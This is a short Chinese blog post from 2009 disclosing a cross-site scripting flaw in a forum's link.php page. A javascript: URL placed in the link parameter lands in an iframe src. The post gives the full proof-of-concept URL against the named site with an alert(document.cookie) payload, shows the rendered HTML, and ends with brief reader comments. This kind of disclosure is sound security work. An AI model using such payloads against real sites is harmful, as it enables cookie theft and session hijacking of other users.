Jul
31
link.php页面不是Dz论坛自带的,是nohack自己写的,虽然用 htmlspecialchars 函数进行处理了, php.ini配置里gpc也开了,虽然没办法通过闭合进行xss,但是nohack却忘记了javascript伪协议放在资源请求里面会被执行:
页面内容:
这种方式还是很多呀!!
http://www.nohack.cn/bbs/link.php?link=javascript:alert(document.cookie)
页面内容:
<iframe id="url_mainframe" frameborder="0" scrolling="yes" name="main" src="javascript:alert(document.cookie)" style="height: 100%; visibility: inherit; width: 100%; z-index: 1;overflow: visible;"></iframe>
这种方式还是很多呀!!
无心
2009/08/12 16:08
呵呵,空气修复漏洞的速度还是蛮快的么~~~~
sH
2009/07/31 16:42
顶!
randsafe
2009/07/31 15:37
鬼友最近学习什么呢?
woyigui 回复于 2009/07/31 16:06
who are you ?
分页: 1/1
1
1
可恶的AntiVir以及
IIS Bad Requ


